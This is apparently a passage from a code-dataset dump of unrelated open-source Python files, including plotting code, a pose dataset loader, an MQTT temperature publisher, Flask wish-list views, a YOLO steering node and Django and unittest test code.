'yellow', alpha = 0.6),\n arrowprops = dict(arrowstyle = '-', connectionstyle = 'arc3,rad=0')) \n \n \n ax.grid(True)\n ax.invert_xaxis()\n ax.yaxis.tick_right()\n ax.yaxis.set_label_position(\"right\")\n ax.set_aspect('equal', 'datalim')\n plt.savefig(plotdir+'SCAN_SAMPLE.png',dpi=300,bbox_inches = 'tight')\n if show:\n plt.show()\n plt.close() \n \n \n fig, ax = plt.subplots(1,1)\n #ax = fig.add_subplot(221)\n plt.rc('xtick', labelsize=14)\n plt.rc('ytick', labelsize=14) \n #plt.title(title,fontsize=26)\n ax.set_ylabel(r'$\\Delta$PC$_Y$ ($\\mu m$)', color='k', fontsize=22)\n ax.set_xlabel(r'$\\Delta$PC$_X$ ($\\mu m$)', color='k',fontsize=22)\n ax.scatter(primary.T[0],primary.T[1],s=12,c='r',alpha=0.9, lw=0)\n if self.secondary is not None:\n ax.scatter(secondary.T[0],secondary.T[1],s=5,c='b',alpha=0.9,lw=0)\n ax.grid(True)\n ax.set_aspect('equal', 'datalim')\n plt.savefig(plotdir+'PCXY.png',dpi=300,bbox_inches = 'tight')\n if show:\n plt.show()\n plt.close()\n \n\n\n fig, ax = plt.subplots(1,1)\n #ax = fig.add_subplot(222)\n plt.rc('xtick', labelsize=14)\n plt.rc('ytick', labelsize=14) \n #plt.title(title,fontsize=26)\n ax.set_ylabel(r'$\\Delta$PC$_Z$ ($\\mu m$)', color='k', fontsize=22)\n ax.set_xlabel(r'$\\Delta$PC$_X$ ($\\mu m$)', color='k',fontsize=22)\n \n ax.scatter(primary.T[0],primary.T[2],s=22,c='red',alpha=1.0,lw=0)\n if self.secondary is not None:\n plt.scatter(secondary.T[0],secondary.T[2],s=10,c='blue',alpha=1.0,lw=0)\n ax.grid(True)\n ax.set_aspect('equal', 'datalim')\n ax.invert_yaxis()\n plt.savefig(plotdir+'PCXZ.png',dpi=300,bbox_inches = 'tight')\n if show:\n plt.show()\n plt.close()\n \n fig, ax = plt.subplots(1,1)\n #ax = fig.add_subplot(223)\n plt.rc('xtick', labelsize=14)\n plt.rc('ytick', labelsize=14) \n #plt.title(title,fontsize=26)\n ax.set_ylabel(r'$\\Delta$PC$_Y$ ($\\mu m$)', color='k', fontsize=22)\n ax.set_xlabel(r'$\\Delta$PC$_Z$ ($\\mu m$)', color='k',fontsize=22)\n #plt.gca().invert_yaxis() # consistent with y measured from top of pattern\n ax.scatter(primary.T[2],primary.T[1],s=22,c='r',alpha=1.0,lw=0)\n if self.secondary is not None:\n ax.scatter(secondary.T[2],secondary.T[1],s=10,c='b',alpha=1.0,lw=0)\n #plt.plot(primary.T[2],fittedY,'y-' )\n ax.grid(True)\n ax.set_aspect('equal', 'datalim')\n ax.invert_xaxis()\n plt.savefig(plotdir+'PCYZ.png',dpi=300,bbox_inches = 'tight')\n if show:\n plt.show()\n plt.close()\n \n \n # ---------- 3D PLOT ----------------\n if plot3d:\n rc('font',size=16)\n #rc('font',family='serif')\n rc('axes',labelsize=16)\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n \n # best fit PLANE\n if self.plane_quad is not None:\n quad_verts=[self.plane_quad_3d]\n ax.add_collection3d( Poly3DCollection(quad_verts, facecolors='b', linewidths=1, alpha=0.4) )\n \n ax.scatter(primary.T[0],primary.T[2],primary.T[1], c='r', s=8, marker='o',lw=0.1, edgecolors='k',alpha=1.0)\n plt.grid(True)\n \n #if self.secondary is not None:\n #ax.scatter(secondary.T[0],secondary.T[2],secondary.T[1],s=16, c='b', marker='o',lw=0,alpha=0.3)\n\n ax.set_xlabel('\\n'+r'$\\Delta$PC$_X$ ($\\mu m$)')\n ax.set_ylabel('\\n\\n'+r'$\\Delta$PC$_Z$ ($\\mu m$)')\n ax.set_zlabel('\\n\\n'+r'$\\Delta$PC$_Y$ ($\\mu m$)')\n #plt.title(r'sample plane tilt relative to detector plane'+'\\n'\n # +r'$\\tau_X$={0: >#05.2f}'. format(float(np.degrees(self.xtilt_rad)))\n # +r'° $\\nu_Z$= {0: >#05.2f}'. format(float(np.degrees(self.ztilt_rad)))+'° \\n' )\n min3d=np.min(primary)\n max3d=np.max(primary)\n ax.set_xlim3d(min3d, max3d)\n ax.set_ylim3d(min3d, max3d)\n ax.set_zlim3d(min3d, max3d)\n \n [t.set_va('center') for t in ax.get_yticklabels()]\n [t.set_ha('left') for t in ax.get_yticklabels()]\n [t.set_va('center') for t in ax.get_xticklabels()]\n [t.set_ha('right') for t in ax.get_xticklabels()]\n [t.set_va('center') for t in ax.get_zticklabels()]\n [t.set_ha('left') for t in ax.get_zticklabels()]\n \n ax.xaxis._axinfo['tick']['inward_factor'] = 0\n ax.xaxis._axinfo['tick']['outward_factor'] = 0.4\n ax.yaxis._axinfo['tick']['inward_factor'] = 0\n ax.yaxis._axinfo['tick']['outward_factor'] = 0.4\n ax.zaxis._axinfo['tick']['inward_factor'] = 0\n ax.zaxis._axinfo['tick']['outward_factor'] = 0.4\n ax.zaxis._axinfo['tick']['outward_factor'] = 0.4\n \n ax.xaxis.set_major_locator(MultipleLocator(3000))\n ax.yaxis.set_major_locator(MultipleLocator(3000))\n ax.zaxis.set_major_locator(MultipleLocator(3000))\n \n plt.gca().invert_yaxis() # view from detector along negative Z\n plt.savefig(plotdir+'PCXYZ_FIT.png',dpi=300) # ,bbox_inches = 'tight')\n if show:\n plt.show()\n plt.close() ","repo_name":"wiai/xcdskd","sub_path":"src/aloe/plotting/pcplotter.py","file_name":"pcplotter.py","file_ext":"py","file_size_in_byte":10491,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"12445167875","text":"# references:\n# https://github.com/weigq/3d_pose_baseline_pytorch/blob/master/src/datasets/human36m.py\n# https://github.com/una-dinosauria/3d-pose-baseline/blob/master/src/linear_model.py#L247\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\n\n\nclass Human36M(Dataset):\n def __init__(self, pose_set_2d, pose_set_3d, camera_frame=True):\n \"\"\"\n\n Args:\n pose_set_2d (dict[tuple, numpy.array]): 2d pose set.\n pose_set_3d (dict[tuple, numpy.array]): 3d pose set.\n camera_frame (bool, optional): Make this True if pose_set_3d is in camera coordinates. Defaults to True.\n \"\"\"\n self.poses_2d = []\n self.poses_3d = []\n self.actions = []\n\n for key2d in pose_set_2d.keys():\n subj, act, seqname = key2d\n # Keys should be the same if 3d poses are in camera frame.\n key3d = (\n key2d\n if camera_frame\n else (subj, act, \"{}.h5\".format(seqname.split(\".\")[0]))\n )\n\n poses_2d = pose_set_2d[key2d] # [n, 16 x 2]\n poses_3d = pose_set_3d[key3d] # [n, n_joints x 3]\n assert len(poses_2d) == len(poses_3d)\n actions = [act] * len(poses_2d) # [n,]\n\n self.poses_2d.append(poses_2d)\n self.poses_3d.append(poses_3d)\n self.actions.extend(actions)\n\n self.poses_2d = np.vstack(self.poses_2d) # [N, 16 x 2]\n self.poses_3d = np.vstack(self.poses_3d) # [N, n_joints x 3]\n self.actions = np.array(self.actions) # [N,]\n\n assert len(self.poses_2d) == len(self.poses_3d) == len(self.actions)\n\n def __getitem__(self, idx):\n \"\"\"Get a set of 2d pose, 3d pose, and action.\n\n Args:\n idx (int): Index of the 2d/3d pose pair to get.\n\n Returns:\n (dict): a set of 2d pose, 3d pose, and action.\n pose_2d (torch.Tensor): 2d pose (model input).\n pose_3d (torch.Tensor): 3d pose (model output i.e., label).\n action (str): Action to which the pose pair belongs.\n \"\"\"\n pose_2d = torch.from_numpy(self.poses_2d[idx]).float()\n pose_3d = torch.from_numpy(self.poses_3d[idx]).float()\n action = self.actions[idx]\n\n return {\"pose_2d\": pose_2d, \"pose_3d\": pose_3d, \"action\": action}\n\n def __len__(self):\n \"\"\"Return the number of the samples.\n\n Returns:\n (int): Number of the samples.\n \"\"\"\n return len(self.poses_2d)\n","repo_name":"motokimura/3d-pose-baseline-pytorch","sub_path":"human_3d_pose_baseline/datasets/human36m.py","file_name":"human36m.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"47"} +{"seq_id":"72918716942","text":"import paho.mqtt.client as paho\nimport psutil as ps\nimport time\nimport json\n\nbroker=\"127.0.0.1\"\nport=1883\ndata = {'cpu0':{},'cpu1':{}}\n\ndef on_publish(client,userdata,result): #create function for callback\n print(\"data published \\n\")\n pass\ndef on_disconnect(client, userdata, rc):\n print(\"client disconnected ok\")\n \nprint(json.dumps(data))\nclient1= paho.Client(\"control1\") #create client object\nclient1.on_disconnect = on_disconnect\nclient1.on_publish = on_publish #assign function to callback\nclient1.connect(broker,port) #establish connection\nclient1.subscribe(\"Cpu\")\nwhile True:\n\tresult = ps.sensors_temperatures()\n\tmillis = int(round(time.time() * 1000))\n\tdata['cpu0']['Temperature'] = result['coretemp'][1][1]\n\tdata['cpu1']['Temperature'] = result['coretemp'][2][1]\n\tdata['cpu0']['Time'] = millis\n\tdata['cpu1']['Time'] = millis\n\tret= client1.publish(\"Cpu\",json.dumps(data)) \n\ttime.sleep(3)\nclient1.disconnect()\n\n","repo_name":"FelipeSchreiber/IoT","sub_path":"TrabalhoNodeRed/mqtt.py","file_name":"mqtt.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72454369104","text":"from odoo import models\n\n\nclass ProductAttributeValue(models.Model):\n _name = 'product.attribute.value'\n _inherit = ['product.attribute.value', 'integration.model.mixin']\n\n def to_export_format(self, integration):\n self.ensure_one()\n\n return {\n 'external_id': self.try_to_external(integration),\n 'attribute': self.attribute_id.to_external_or_export(integration),\n 'name': integration.convert_translated_field_to_integration_format(\n self, 'name',\n ),\n }\n\n def export_with_integration(self, integration):\n self.ensure_one()\n return integration.export_attribute_value(self)\n","repo_name":"JUMO-Technologies/prestashop","sub_path":"integration/models/product_attribute_value.py","file_name":"product_attribute_value.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39175835067","text":"#!/usr/bin/env python3\n\n\"\"\"Verify bench_stuff.py functions and functionality across valid and invalid inputs.\"\"\"\n\nimport unittest\nfrom pathlib import PosixPath\nfrom shutil import copytree\nfrom tempfile import TemporaryDirectory\nfrom unittest.mock import Mock, call, patch\n\nimport bench_stuff\n\n\nclass FakeEnv(Mock):\n\n envs = None\n\n def int(self, key):\n return int(self.envs[key])\n\n def str(self, key):\n return str(self.envs[key])\n\n\ndef fakedie(msg, code=1):\n raise RuntimeError(msg)\n\n\nclass TestBase(unittest.TestCase):\n\n TEMPDIR = None\n FAKE_FIRESTORE = None\n FAKE_DIE = None\n FAKE_ENV = None\n FAKE_BENCH_VER = 1\n FAKE_CPUS = 96\n FAKE_MEM = 1024 * 1024\n FAKE_TASK = 12345\n FAKE_BUILD = 54321\n FAKE_BRANCH = \"test/testing\"\n FAKE_DISTRO = \"TestOS-42\"\n FAKE_UNAME_R = \"1.2.3-4.i386\"\n FAKE_UNAME_M = \"i386\"\n FAKE_INST = \"box\"\n FAKE_COMMIT = \"1e06c1a47a71cc649032bf6ee71e14b990dae957\"\n\n def setUp(self):\n bench_stuff.VERBOSE = False\n self.FAKE_FIRESTORE = Mock(spec=bench_stuff.firestore)\n # The env class/objects operate with a global-scope, which makes testing hard.\n # Avoid trying to keep globals \"sane\" by mocking out envparse.env() entirely.\n self.FAKE_ENV = FakeEnv()\n self.FAKE_ENV.envs = {\n \"BENCH_ENV_VER\": self.FAKE_BENCH_VER,\n \"CPUTOTAL\": self.FAKE_CPUS,\n \"MEMTOTALKB\": self.FAKE_MEM,\n \"CIRRUS_TASK_ID\": self.FAKE_TASK,\n \"CIRRUS_BUILD_ID\": self.FAKE_BUILD,\n \"CIRRUS_BRANCH\": self.FAKE_BRANCH,\n \"DISTRO_NV\": self.FAKE_DISTRO,\n \"UNAME_R\": self.FAKE_UNAME_R,\n \"UNAME_M\": self.FAKE_UNAME_M,\n \"INST_TYPE\": self.FAKE_INST,\n \"CIRRUS_CHANGE_IN_REPO\": self.FAKE_COMMIT,\n }\n self.FAKE_DIE = Mock(side_effect=fakedie)\n patch('bench_stuff.firestore', new=self.FAKE_FIRESTORE).start()\n patch('bench_stuff.env', new=self.FAKE_ENV).start()\n patch('bench_stuff.die', new=self.FAKE_DIE).start()\n self.addCleanup(patch.stopall)\n self.TEMPDIR = TemporaryDirectory(prefix=\"tmp_test_bench_stuff_\")\n\n def tearDown(self):\n self.TEMPDIR.cleanup()\n\n\nclass TestMain(TestBase):\n\n def setUp(self):\n super().setUp()\n\n def test_good(self):\n tmp = PosixPath(self.TEMPDIR.name)\n copytree(\"./test_data/good\", tmp, dirs_exist_ok=True)\n\n bench_stuff.main(tmp / \"benchmarks.env\", tmp / \"benchmarks.csv\")\n self.FAKE_ENV.read_envfile.assert_called_with(tmp / \"benchmarks.env\")\n\n self.assertTrue(self.FAKE_FIRESTORE.Client.called)\n test_client = self.FAKE_FIRESTORE.Client\n\n bench_call = call().collection('benchmarks')\n type_call = call().collection().document(self.FAKE_UNAME_M)\n key_call = call().collection().document().collection().document(str(self.FAKE_TASK))\n calls = [bench_call, type_call, key_call]\n test_client.assert_has_calls(calls, any_order=True)\n\n @patch('bench_stuff.DRYRUN', new=True)\n def test_dry_run(self):\n tmp = PosixPath(self.TEMPDIR.name)\n copytree(\"./test_data/good\", tmp, dirs_exist_ok=True)\n bench_stuff.main(tmp / \"benchmarks.env\", tmp / \"benchmarks.csv\")\n self.FAKE_FIRESTORE.Client.assert_not_called()\n\n def test_unknown_units(self):\n tmp = PosixPath(self.TEMPDIR.name)\n # Contains data with an invalid unit-suffix\n copytree(\"./test_data/bad\", tmp, dirs_exist_ok=True)\n self.FAKE_DIE.assert_not_called()\n self.assertRaisesRegex(RuntimeError,\n r\"parse units from\",\n bench_stuff.main,\n tmp / \"benchmarks.env\",\n tmp / \"benchmarks.csv\")\n self.FAKE_DIE.assert_called_once()\n\n\nclass TestUtils(TestBase):\n\n def test_seconds(self):\n data = {\"lower\": \"1.0001s\", \"upper\": \"1.0001S\", \"space\": \"1.0001 s\"}\n result = bench_stuff.handle_units(data)\n for key in (\"lower\", \"upper\", \"space\"):\n self.assertAlmostEqual(result[key], 1.0001)\n\n def test_kb(self):\n data = {\"lower\": \"1023.99kb\", \"upper\": \"1023.99KB\", \"space\": \"1023.99 kb\"}\n result = bench_stuff.handle_units(data)\n for key in (\"lower\", \"upper\", \"space\"):\n self.assertEqual(result[key], 1048566)\n\n def test_no_units(self):\n self.FAKE_DIE.assert_not_called()\n self.assertRaisesRegex(RuntimeError,\n r\"parse units from.+answer.+42\",\n bench_stuff.handle_units,\n {\"answer\": \"42\"})\n self.FAKE_DIE.assert_called_once()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"CVEDB/automation","sub_path":"bench_stuff/test/test_bench_stuff.py","file_name":"test_bench_stuff.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39044509114","text":"from typing import Any, Callable, Dict, Optional, Union, cast\n\nfrom determined import pytorch, util\n\n# AMP is only available in PyTorch 1.6+\ntry:\n import torch.cuda.amp as amp\nexcept ImportError:\n # A warning is logged in _pytorch_context.py\n pass\n\n\nclass PyTorchExperimentalContext:\n def __init__(self, parent: Any) -> None:\n self._parent = parent\n self._auto_amp = False\n\n def use_amp(self) -> None:\n \"\"\"\n Handles all operations for the most simple cases automatically with a default gradient\n scaler. Specifically, wraps forward pass in an autocast context, scales loss before\n backward pass, unscales before clipping gradients, uses scaler when stepping\n optimizer(s), and updates scaler afterwards. Do not call ``wrap_scaler`` directly when\n using this method.\n\n PyTorch 1.6 or greater is required for this feature.\n \"\"\"\n self._parent.wrap_scaler(amp.GradScaler()) # type: ignore\n self._auto_amp = True\n\n @util.deprecated(\n \"context.experimental.reset_reducers() is deprecated since 0.15.2 and will be removed in a \"\n \"future version; use context.reset_reducers() directly.\"\n )\n def reset_reducers(self) -> None:\n self._parent.reset_reducers()\n\n @util.deprecated(\n \"context.experimental.wrap_reducer() is deprecated since 0.15.2 and will be removed in a \"\n \"future version; use context.wrap_reducer() directly.\"\n )\n def wrap_reducer(\n self,\n reducer: Union[Callable, pytorch.MetricReducer],\n name: Optional[str] = None,\n for_training: bool = True,\n for_validation: bool = True,\n ) -> pytorch.MetricReducer:\n return cast(\n pytorch.MetricReducer,\n self._parent.wrap_reducer(reducer, name, for_training, for_validation),\n )\n\n @util.deprecated(\n \"context.experimental.reduce_metrics() is deprecated since 0.15.2 and will be removed in a \"\n \"future version; use context.reduce_metrics() directly.\"\n )\n def reduce_metrics(self, for_training: bool) -> Dict[str, Any]:\n return cast(\n dict,\n self._parent.reduce_metrics(for_training),\n )\n","repo_name":"ahj-determined/determined","sub_path":"harness/determined/pytorch/_experimental.py","file_name":"_experimental.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"15676890749","text":"import datetime\nfrom typing import Any\n\nfrom flask import render_template, current_app, request, flash, redirect, url_for, jsonify, Blueprint\nfrom flask_login import login_required, current_user\nfrom flask_paginate import Pagination, get_page_args\n\nfrom app import app\nfrom app.forms import WishForm\nfrom app.models.item import Item\nfrom app.models.property import Property\nfrom app.models.wish import Wish\nfrom app.models.wish_property import WishProperty\nfrom app.services.base_wish_list_service import BaseWishListService\n\nwish_list = Blueprint('wish_list', __name__, url_prefix='/wish_list')\n\n\n@app.route('/', methods=['GET', 'POST'])\n@wish_list.route('/index', methods=['GET', 'POST'])\n@login_required\ndef index(wish_list_service: BaseWishListService) -> Any:\n \"\"\"\n Wish List主頁,列出使用者所有的Wish\n Args:\n wish_list_service: WishList相關的商業邏輯\n\n Returns: Any\n\n \"\"\"\n wishes = wish_list_service.get_user_wishes(Wish(user_id=current_user.id))\n\n page, per_page, start = get_page_args(page_parameter='page', per_page_parameter='per_page')\n pagination = Pagination(page=page, per_page=per_page, total=len(wishes), bs_version=4, alignment='center',\n record_name='wishes')\n\n img_item_dir_url = current_app.config['IMG_DIR_URL'] or ''\n\n return render_template('wish_list/index.html', title='Wish List', current_user=current_user,\n wishes=wishes[start:start + per_page],\n pagination=pagination, img_item_dir_url=img_item_dir_url)\n\n\n@wish_list.route('/delete_wish/', defaults={'id': None}, methods=['POST'])\n@wish_list.route('/delete_wish/', methods=['POST'])\n@login_required\ndef delete_wish(id, wish_list_service: BaseWishListService) -> Any:\n \"\"\"\n 刪除某個Wish\n Args:\n id: Wish id\n wish_list_service: WishList相關的商業邏輯\n\n Returns: Any\n\n \"\"\"\n wish_list_service.delete_wish_from_list(Wish(id=id))\n return redirect(url_for('wish_list.index'))\n\n\n@wish_list.route('/new_wish/', defaults={'id': None}, methods=['GET', 'POST'])\n@wish_list.route('/edit_wish/', methods=['GET', 'POST'])\n@login_required\ndef edit_wish(id, wish_list_service: BaseWishListService) -> Any:\n \"\"\"\n 新增/修改某個Wish\n Args:\n id: Wish id\n wish_list_service: WishList相關的商業邏輯\n\n Returns: Any\n\n \"\"\"\n obj = wish_list_service.get_wish_by_id(Wish(id=id))\n if obj:\n obj.item_type = obj.item.type\n\n form = WishForm(obj=obj)\n\n # bind item type\n item_typies = wish_list_service.get_all_item_types()\n form.item_type.choices = [(item_type.id, item_type.name) for item_type in item_typies]\n form.item_type.choices.insert(0, ('', 'Choose'))\n\n # bind item\n items = wish_list_service.get_all_these_types_of_items(Item(type=form.item_type.data))\n form.item_id.choices = [(item.id, item.name) for item in items]\n form.item_id.choices.insert(0, ('', 'Choose'))\n\n # bind property\n properties = wish_list_service.get_all_the_property_of_this_item(Property(item_id=form.item_id.data))\n\n if properties:\n num_of_types = max(property.type for property in properties)\n\n for i in range(num_of_types):\n if len(form.wish_properties.entries) <= i or len(form.wish_properties.entries) == 0:\n form.wish_properties.append_entry()\n form.wish_properties.entries[i].form.property_id.choices.insert(0, ('', 'Any', {'tip': ''}))\n\n [form.wish_properties.entries[property.type - 1].form.property_id.choices.append((property.id, property.name, {\n 'tip': '★' if property.is_ability else (f'{str(property.min)} - {str(property.max)}'\n if (property.min and property.max) else '')}))\n for property in properties]\n\n form.wish_properties.entries[0].form.property_id.label.text = 'Property'\n form.wish_properties.entries[0].form.roll.label.text = 'Roll'\n\n if request.method == 'POST' and form.validate_on_submit():\n\n wish = Wish(\n id=id,\n currency=form.currency.data,\n min_level=form.min_level.data,\n max_bid=form.max_bid.data,\n max_buyout=form.max_buyout.data,\n user_id=current_user.id,\n item_id=form.item_id.data,\n create_date=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n modify_date=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n )\n\n for i, property_form in enumerate(form.wish_properties.data, start=1):\n wish_property = WishProperty(\n type=i,\n roll=property_form['roll'],\n property_id=property_form['property_id'] or None,\n wish_id=id,\n create_date=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n modify_date=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n wish.wish_properties.append(wish_property)\n\n wish_list_service.add_new_wish(wish)\n\n flash('Save success', 'success')\n return redirect(url_for('wish_list.index'))\n\n return render_template('wish_list/edit_wish.html', form=form, current_user=current_user,\n title='New Wish' if id is None else 'Edit Wish')\n\n\n@wish_list.route('/item/', defaults={'type': None}, methods=['POST'])\n@wish_list.route('/item/')\n@login_required\ndef item(type, wish_list_service: BaseWishListService) -> Any:\n \"\"\"\n 取得所有某個類型的道具\n Args:\n type: 道具類型\n wish_list_service: WishList相關的商業邏輯\n\n Returns: Any\n\n \"\"\"\n items = wish_list_service.get_all_these_types_of_items(Item(type=type))\n items_array = [{'id': item.id, 'name': item.name} for item in items]\n items_array.insert(0, {'id': '', 'name': 'Choose'})\n\n return jsonify({'items': items_array})\n\n\n@wish_list.route('/property/', defaults={'item_id': None}, methods=['POST'])\n@wish_list.route('/property/')\n@login_required\ndef property(item_id, wish_list_service: BaseWishListService) -> Any:\n \"\"\"\n 取得某個道具的屬性\n Args:\n item_id: 道具id\n wish_list_service: WishList相關的商業邏輯\n\n Returns: Any\n\n \"\"\"\n properties = wish_list_service.get_all_the_property_of_this_item(Property(item_id=item_id))\n\n property_array = []\n\n if properties:\n num_of_types = max(property.type for property in properties)\n\n [property_array.append({'id': '', 'name': 'Any', 'type': i + 1, 'tip': ''}) for\n i in range(num_of_types)]\n\n [property_array.append({'id': property.id, 'name': property.name, 'type': property.type,\n 'tip': '★' if property.is_ability else (f'{str(property.min)} - {str(property.max)}'\n if (property.min and property.max) else '')})\n for property in properties]\n\n return jsonify({'properties': property_array})\n","repo_name":"edensquall/RoshpitWishList","sub_path":"app/views/wish_list.py","file_name":"wish_list.py","file_ext":"py","file_size_in_byte":7067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24581702660","text":"from ultralytics import YOLO\nimport cv2\nimport torch\nimport numpy as np\nimport rclpy\nfrom rclpy.node import Node\nfrom steady_msgs import WriteCar\n\n\nclass YOLOPlanning(Node):\n def __init__(self):\n super().__init__('yolo_planning')\n self.erp_pub = self.create_publisher(WriteCar, 'complex_control', 10)\n self.erp = WriteCar()\n\n def pub_serial(self, go, speed, steer):\n self.erp.complex = go #True false\n self.erp.write_speed = speed\n self.erp.write_steer = steer\n self.erp_pub.publish(self.erp)\n\nmodel = YOLO('complex1.pt') # pretrained YOLOv8n model\n\n\nresults = model.predict(\"z2.jpg\", show=True)\n\ngo = False\nsteer = 0\nspeed = 60\n\n\n# Priority\n# x -> y -> stop_line -> speedbump -> z -> speed_sign\n'''\nspeed_sign : 0\nspeedbump : 1\nstop_line : 2\nx : 3\ny : 4\nz : 5\n'''\ndef yolo_steer(node):\n for r in results:\n box = r.boxes\n box_cls = box.cls.cpu().detach().numpy().tolist()\n box_xys = box.xyxy.cpu().detach().numpy().tolist()\n # cam_centre = 320\n image_x = r.orig_shape\n cam_centre = image_x[1]/2\n #normalized 0~1 사이인지 보고 0.5 도 확인\n\n \n # if gap is +, it's on left, when - it's on right\n\n print(\"box_cls : \", box_cls)\n print(\"box_xys : \", box_xys)\n\n if len(box_cls) > 0:\n go = True\n print(\"True\")\n\n\n if 3.0 in box_cls:\n box_ind = box_cls.index(3.0)\n print(\"x\")\n print(\"=======\")\n box_x = (box_xys[box_ind][0] + box_xys[box_ind][2])/2\n gap = cam_centre - box_x\n # if box_x < cam_centre:\n if 0 <= gap < 30:\n steer = 0\n print(\"turn left, steer 0\")\n elif 30 <= gap < 60:\n steer = -60\n print(\"turn left, steer -60\")\n elif 60 <= gap:\n steer = -90\n print(\"turn left, steer -90\")\n elif -30 < gap <= 0:\n steer = 0\n print(\"turn right, steer 0\")\n elif -60 < gap <= -30:\n steer = 60\n print(\"turn right, steer 60\")\n elif gap <= -60:\n steer = 90\n print(\"turn right, steer 90\")\n\n elif 4.0 in box_cls:\n box_ind = box_cls.index(4.0)\n print(\"y\")\n print(\"=======\")\n box_x = (box_xys[box_ind][0] + box_xys[box_ind][2])/2\n gap = cam_centre - box_x\n if 0 <= gap < 30:\n steer = 0\n print(\"turn left, steer 0\")\n elif 30 <= gap < 60:\n steer = -60\n print(\"turn left, steer -60\")\n elif 60 <= gap:\n steer = -90\n print(\"turn left, steer -90\")\n elif -30 < gap <= 0:\n steer = 0\n print(\"turn right, steer 0\")\n elif -60 < gap <= -30:\n steer = 60\n print(\"turn right, steer 60\")\n elif gap <= -60:\n steer = 90\n print(\"turn right, steer 90\")\n\n elif 2.0 in box_cls:\n box_ind = box_cls.index(2.0)\n print(\"stop_line\")\n print(\"=======\")\n box_x = (box_xys[box_ind][0] + box_xys[box_ind][2])/2\n gap = cam_centre - box_x\n if 0 <= gap < 30:\n steer = 0\n print(\"turn left, steer 0\")\n elif 30 <= gap < 60:\n steer = -60\n print(\"turn left, steer -60\")\n elif 60 <= gap:\n steer = -90\n print(\"turn left, steer -90\")\n elif -30 < gap <= 0:\n steer = 0\n print(\"turn right, steer 0\")\n elif -60 < gap <= -30:\n steer = 60\n print(\"turn right, steer 60\")\n elif gap <= -60:\n steer = 90\n print(\"turn right, steer 90\")\n\n elif 1.0 in box_cls:\n box_ind = box_cls.index(1.0)\n print(\"speedbump\")\n print(\"=======\")\n box_x = (box_xys[box_ind][0] + box_xys[box_ind][2])/2\n gap = cam_centre - box_x\n if 0 <= gap < 30:\n steer = 0\n print(\"turn left, steer 0\")\n elif 30 <= gap < 60:\n steer = -60\n print(\"turn left, steer -60\")\n elif 60 <= gap:\n steer = -90\n print(\"turn left, steer -90\")\n elif -30 < gap <= 0:\n steer = 0\n print(\"turn right, steer 0\")\n elif -60 < gap <= -30:\n steer = 60\n print(\"turn right, steer 60\")\n elif gap <= -60:\n steer = 90\n print(\"turn right, steer 90\")\n\n elif 5.0 in box_cls:\n box_ind = box_cls.index(5.0)\n steer = 0\n print(\"z\")\n print(\"=======\")\n print(\"steer 0\")\n \n elif 0.0 in box_cls:\n box_ind = box_cls.index(0.0)\n steer = 0\n print(\"speed_sign\")\n print(\"=======\")\n print(\"steer 0\")\n\n\n # Tollgate\n indices = [i for i, value in enumerate(box_cls) if value == 16.0]\n if len(indices) == 2:\n box_x_values = []\n\n for tollgate_ind in indices:\n box_x = (box_xys[tollgate_ind][0] + box_xys[tollgate_ind][2]) / 2\n box_x_values.append(box_x)\n\n avg_box_tollgate = sum(box_x_values) / 2\n print(\"Average box_x : \", avg_box_tollgate)\n gap_tollgate = cam_centre - avg_box_tollgate\n if 0 <= gap_tollgate < 30:\n steer = 0\n print(\"turn left, steer 0\")\n elif 30 <= gap_tollgate < 60:\n steer = -60\n print(\"turn left, steer -60\")\n elif 60 <= gap_tollgate:\n steer = -90\n print(\"turn left, steer -90\")\n elif -30 < gap_tollgate <= 0:\n steer = 0\n print(\"turn right, steer 0\")\n elif -60 < gap_tollgate <= -30:\n steer = 60\n print(\"turn right, steer 60\")\n elif gap_tollgate <= -60:\n steer = 90\n print(\"turn right, steer 90\")\n\n\n node.pub_serial(go, speed, steer)\n\n\ndef main(args=None):\n rclpy.init(args=args)\n node = YOLOPlanning()\n\n yolo_steer(node)\n\n node.destroy_node()\n rclpy.shutdown()\n\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"aarchiiive/steadylab","sub_path":"src/yo/yo/complex_planning.py","file_name":"complex_planning.py","file_ext":"py","file_size_in_byte":6584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14389792942","text":"from __future__ import unicode_literals\nimport re\nfrom datetime import timedelta, time\n\nfrom django.test import TestCase\nfrom django.utils.timezone import now\nfrom django.urls import reverse\n\nfrom osler.core.models import Patient\nfrom osler.core.tests.test_views import log_in_user, build_user\nfrom osler.users.tests import factories as user_factories\n\nfrom osler.appointment import models\nfrom osler.appointment.test_forms import apt_dict\n\n\nclass TestAppointmentViews(TestCase):\n\n fixtures = ['core', 'workup']\n\n def setUp(self):\n\n self.user = build_user()\n\n log_in_user(self.client, self.user)\n\n self.apt = models.Appointment.objects.create(\n comment='test this stuff',\n clindate=now().date(),\n clintime=time(9, 0),\n appointment_type='PSYCH_NIGHT',\n author=self.user,\n author_type=self.user.groups.first(),\n patient=Patient.objects.first())\n\n def test_new_appointment_view(self):\n # Getting to new appointment view\n response = self.client.get(reverse(\"appointment-new\"))\n self.assertEqual(response.status_code, 200)\n\n # Posting new appointment\n response = self.client.post(reverse(\"appointment-new\"), data=apt_dict())\n self.assertEqual(response.status_code, 302)\n\n def 